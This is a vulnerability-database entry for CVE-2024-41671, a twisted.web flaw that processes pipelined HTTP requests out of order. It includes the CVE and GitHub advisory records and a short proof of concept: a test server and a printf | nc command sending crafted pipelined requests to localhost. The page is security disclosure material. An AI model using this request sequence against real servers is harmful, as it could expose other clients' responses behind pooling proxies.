cvelistv5 - cve-2024-41671

cve-2024-41671

Vulnerability from cvelistv5

Published

2024-07-29 14:37

Modified

2024-09-16 16:19

Severity ?

8.3 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Summary

twisted.web has disordered HTTP pipeline response

References

▼	URL	Tags
	security-advisories@github.com	https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
	security-advisories@github.com	https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc
	security-advisories@github.com	https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7

Impacted products

▼	Vendor	Product
	twisted	twisted

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-09-16T16:19:21.128Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://www.vicarius.io/vsociety/posts/disordered-http-pipeline-in-twistedweb-cve-2024-4167"
          },
          {
            "name": "https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7"
          },
          {
            "name": "https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33"
          },
          {
            "name": "https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc"
          }
        ],
        "title": "CVE Program Container",
        "x_generator": {
          "engine": "ADPogram 0.0.1"
        }
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:twisted:twisted:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "twisted",
            "vendor": "twisted",
            "versions": [
              {
                "lessThanOrEqual": "24.3.0",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41671",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-29T18:59:07.878098Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-22T15:44:56.204Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "twisted",
          "vendor": "twisted",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 24.3.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Twisted is an event-based framework for internet applications, supporting Python 3.6+. The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure. This vulnerability is fixed in 24.7.0rc1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-444",
              "description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-07-29T14:37:08.484Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7"
        },
        {
          "name": "https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33"
        },
        {
          "name": "https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc"
        }
      ],
      "source": {
        "advisory": "GHSA-c8m8-j448-xjx7",
        "discovery": "UNKNOWN"
      },
      "title": "twisted.web has disordered HTTP pipeline response"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-41671",
    "datePublished": "2024-07-29T14:37:08.484Z",
    "dateReserved": "2024-07-18T15:21:47.485Z",
    "dateUpdated": "2024-09-16T16:19:21.128Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-41671\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-07-29T15:15:15.760\",\"lastModified\":\"2024-07-29T16:21:52.517\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Twisted is an event-based framework for internet applications, supporting Python 3.6+. The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure. This vulnerability is fixed in 24.7.0rc1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\",\"baseScore\":8.3,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-444\"}]}],\"references\":[{\"url\":\"https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

ghsa-c8m8-j448-xjx7

Vulnerability from github

Published

2024-07-29 16:33

Modified

2024-07-29 16:33

Severity ?

8.3 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
6.9 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

Summary

twisted.web has disordered HTTP pipeline response

Details

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

Start a fresh Debian container: sh docker run --workdir /repro --rm -it debian:bookworm-slim
Install twisted and its dependencies: sh apt -y update && apt -y install ncat git python3 python3-pip \ && git clone --recurse-submodules https://github.com/twisted/twisted \ && cd twisted \ && pip3 install --break-system-packages .
Run a twisted.web HTTP server that echos received requests' methods. e.g., the following: ```python from twisted.web import server, resource from twisted.internet import reactor

class TheResource(resource.Resource): isLeaf = True

def render_GET(self, request) -> bytes:
    return b"GET"

def render_POST(self, request) -> bytes:
    return b"POST"

site = server.Site(TheResource()) reactor.listenTCP(80, site) reactor.run() 3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:sh (printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80 4. Observe that the responses arrive out of order: HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:41 GMT Content-Length: 5 Content-Type: text/html

POST HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 4 Content-Type: text/html

GET HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 5 Content-Type: text/html

POST ```

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 24.3.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "twisted"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "24.7.0rc1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-41671"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-29T16:33:11Z",
    "nvd_published_at": "2024-07-29T15:15:15Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.\n\n### PoC\n0. Start a fresh Debian container:\n```sh\ndocker run --workdir /repro --rm -it debian:bookworm-slim\n```\n1. Install twisted and its dependencies:\n```sh\napt -y update \u0026\u0026 apt -y install ncat git python3 python3-pip \\\n    \u0026\u0026 git clone --recurse-submodules https://github.com/twisted/twisted \\\n    \u0026\u0026 cd twisted \\\n    \u0026\u0026 pip3 install --break-system-packages .\n```\n2. Run a twisted.web HTTP server that echos received requests\u0027 methods. e.g., the following:\n```python\nfrom twisted.web import server, resource\nfrom twisted.internet import reactor\n\nclass TheResource(resource.Resource):\n    isLeaf = True\n\n    def render_GET(self, request) -\u003e bytes:\n        return b\"GET\"\n\n    def render_POST(self, request) -\u003e bytes:\n        return b\"POST\"\n\nsite = server.Site(TheResource())\nreactor.listenTCP(80, site)\nreactor.run()\n```\n3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:\n```sh\n(printf \u0027POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n0\\r\\n\\r\\nPOST / HTTP/1.1\\r\\nContent-Length: 0\\r\\n\\r\\n\u0027; sleep 1; printf \u0027GET / HTTP/1.1\\r\\n\\r\\n\u0027; sleep 1) | nc localhost 80\n```\n4. Observe that the responses arrive out of order:\n```\nHTTP/1.1 200 OK\nServer: TwistedWeb/24.3.0.post0\nDate: Tue, 09 Jul 2024 06:19:41 GMT\nContent-Length: 5\nContent-Type: text/html\n\nPOST\nHTTP/1.1 200 OK\nServer: TwistedWeb/24.3.0.post0\nDate: Tue, 09 Jul 2024 06:19:42 GMT\nContent-Length: 4\nContent-Type: text/html\n\nGET\nHTTP/1.1 200 OK\nServer: TwistedWeb/24.3.0.post0\nDate: Tue, 09 Jul 2024 06:19:42 GMT\nContent-Length: 5\nContent-Type: text/html\n\nPOST\n```\n\n### Impact\nSee [GHSA-xc8x-vp79-p3wm](https://github.com/twisted/twisted/security/advisories/GHSA-xc8x-vp79-p3wm). Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.",
  "id": "GHSA-c8m8-j448-xjx7",
  "modified": "2024-07-29T16:33:11Z",
  "published": "2024-07-29T16:33:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41671"
    },
    {
      "type": "WEB",
      "url": "https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33"
    },
    {
      "type": "WEB",
      "url": "https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/twisted/twisted"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "twisted.web has disordered HTTP pipeline response"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2024-41671

Vulnerability from cvelistv5

ghsa-c8m8-j448-xjx7

Vulnerability from github

Summary

PoC

Impact

Tags

Sightings

Nomenclature